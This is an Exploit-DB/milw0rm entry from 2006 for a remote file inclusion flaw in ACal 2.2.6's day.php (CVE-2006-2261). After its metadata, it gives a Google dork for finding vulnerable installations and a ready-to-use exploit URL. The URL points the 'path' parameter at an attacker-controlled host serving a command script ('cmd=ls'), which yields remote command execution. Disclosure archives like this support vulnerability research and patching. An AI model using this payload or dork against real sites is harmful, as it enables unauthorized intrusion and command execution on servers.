ACal 2.2.6 - 'day.php' Remote File Inclusion
Author: PiNGuX
type: webapps
platform: php
port:
date_added: 2006-05-06
date_updated: 2015-04-18
verified: 1
codes: OSVDB-25340;CVE-2006-2261
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comACal-2.2.6.zip
$*******************************************$
$ Title: ACal 2.2.6 = Remote File Inclusion $
$*******************************************$
$ URL: http://acalproj.sourceforge.net/ $
$***************************************$
$ Dork: intitle:"Login to Calendar" $
$***********************************$
$ Credits: PiNGuX $
$*****************$
$ Greetz : [0o] $
$***************$
Exploit:
http://[url]/[calendar_path]/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls
# milw0rm.com [2006-05-07]